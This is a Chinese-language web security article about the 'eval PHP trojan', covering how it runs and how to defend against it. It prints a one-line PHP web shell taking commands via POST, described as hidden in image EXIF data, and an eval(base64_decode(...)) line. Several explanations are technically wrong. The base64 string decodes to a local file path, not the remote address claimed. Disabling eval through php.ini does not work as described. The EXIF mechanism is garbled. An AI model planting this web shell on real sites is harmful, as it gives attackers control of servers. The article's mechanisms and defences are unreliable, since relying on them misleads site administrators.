最近有個(gè)惡意軟件愈演愈烈，它的名字叫做 eval php木馬。這個(gè)木馬會(huì)嵌入被攻擊網(wǎng)站的一個(gè) PHP 文件中，然后通過(guò) eval 函數(shù)對(duì)惡意代碼進(jìn)行執(zhí)行。這讓攻擊者可以獲取被攻擊網(wǎng)站的管理員權(quán)限，并對(duì)網(wǎng)站上的數(shù)據(jù)和內(nèi)容進(jìn)行任意操作。下面我們就來(lái)詳細(xì)探討一下 eval php木馬是如何運(yùn)作的。

eval() 函數(shù)是 PHP 語(yǔ)言的一個(gè)系統(tǒng)函數(shù)，其作用就是將一段字符串作為 PHP 代碼來(lái)執(zhí)行。攻擊者可以通過(guò)對(duì) PHP 代碼進(jìn)行篡改，在被攻擊網(wǎng)站中添加類似下面這樣的代碼：

eval(base64_decode('L2hvbWUvaG9tZS9vYXBvcy85MC9maWxlLnR4dA=='));

這段代碼經(jīng)過(guò) base64 解碼后，變成了一個(gè)指向遠(yuǎn)程惡意文件的地址。它其實(shí)就是告訴服務(wù)器先訪問那個(gè)文件，并將其中的代碼當(dāng)做 PHP 代碼來(lái)執(zhí)行。這種攻擊方式，避免了網(wǎng)站管理員對(duì)惡意代碼的發(fā)現(xiàn)和清除，因?yàn)楣粽呖梢院苋菀椎匦薷倪@個(gè)遠(yuǎn)程文件中的代碼。而且，PHP 代碼通常不會(huì)被瀏覽器直接識(shí)別，因此在普通用戶眼中沒有任何的異常。

有一種變形的 eval php木馬比較常見，就是將惡意代碼放在圖片的 EXIF 中。攻擊者將網(wǎng)站上的一張圖片（比如圖片 URL 是：http://www.example.com/images/example.jpg）的 EXIF 數(shù)據(jù)區(qū)篡改為：

<?php eval($_POST['cmd']); ?>

攻擊者接著發(fā)送一個(gè) POST 請(qǐng)求，將惡意字符串作為 cmd 參數(shù)發(fā)送到如下地址：

http://www.example.com/images/example.jpg

當(dāng)被攻擊網(wǎng)站接收到這個(gè)請(qǐng)求時(shí)，會(huì)將這段字符串插入到圖片的 EXIF 中預(yù)留的位置，然后運(yùn)行通過(guò) eval 的插入的惡意代碼。由于圖片不是 PHP 文件，被攻擊的網(wǎng)站管理員很難察覺到這個(gè)木馬的存在。

那么，如何防范 eval php木馬的攻擊呢？下面我們提供一些可能有效的方法：

• 先要確保網(wǎng)站使用的是最新版本的 PHP，因?yàn)?PHP 團(tuán)隊(duì)在更新版本中通常都會(huì)修復(fù)一些漏洞。
• 修改 PHP 配置文件 php.ini，禁用 eval。在禁用 eval 的同時(shí)，將 register_globals 和 allow_url_fopen 設(shè)置為 Off。
• 對(duì)文件上傳功能進(jìn)行瞎子檢測(cè)，不允許任意文件上傳，并在上傳的過(guò)程中，對(duì)文件的類型以及擴(kuò)展名進(jìn)行嚴(yán)格檢查。
• 對(duì)需要用戶輸入的參數(shù)等內(nèi)容進(jìn)行過(guò)濾和驗(yàn)證，嚴(yán)格限制特殊字符的輸入。同時(shí)，自定義錯(cuò)誤信息，避免幫助攻擊者發(fā)現(xiàn)漏洞。
• 定期對(duì)網(wǎng)站進(jìn)行數(shù)據(jù)備份，保證在被攻擊之后，盡快可以恢復(fù)到正常狀態(tài)。

總之，eval php木馬是一種非常危險(xiǎn)的攻擊方式，它給網(wǎng)站安全與穩(wěn)定帶來(lái)了很大的威脅。因此，網(wǎng)站管理員需要認(rèn)真對(duì)待此類漏洞，并采取相應(yīng)的措施，提高網(wǎng)站的安全性和防范能力。